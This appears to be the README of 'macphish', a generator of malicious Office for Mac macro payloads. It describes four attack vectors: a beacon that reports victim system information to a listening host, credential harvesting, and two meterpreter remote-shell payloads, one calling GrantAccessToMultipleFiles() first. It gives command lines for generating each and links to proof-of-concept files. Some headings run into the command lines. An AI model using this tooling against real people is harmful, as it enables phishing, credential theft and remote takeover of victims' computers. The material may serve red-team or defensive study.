Office for Mac Macro Payload Generator.
Attack vectors
There are 4 attack vectors available:
- beacon
- creds
- meterpreter
- meterpreter-grant
beacon
On execution, this payload will signal our listening host and provide basic system information about the victim. The simplest way of generating a beacon payload is:
$./macphish.py -lh   creds
$./macphish.py -lh  -lp  -a creds  meterpreter
The simplest way of generating a meterpreter payload is:
$./macphish.py -lh  -lp  -p  -a meterpreter    meterpreter-grant
The generate a meterpreter payload that calls GrantAccessToMultipleFiles() first:
$./macphish.py -lh  -lp  -p  -a meterpreter-grant   Usage
See https://github.com/cldrn/macphish/wiki/Usage
PoCs
- https://drive.google.com/open?id=0BzPR8exG0kt6TlY1UWhiemVKRnc
- https://drive.google.com/open?id=0BzPR8exG0kt6WWUzU0tKUjFhdjg
- https://drive.google.com/open?id=0BzPR8exG0kt6VzlaWVVJdEtNR0k
- https://drive.google.com/open?id=0BzPR8exG0kt6SnJwM01KSzAzMjA
 
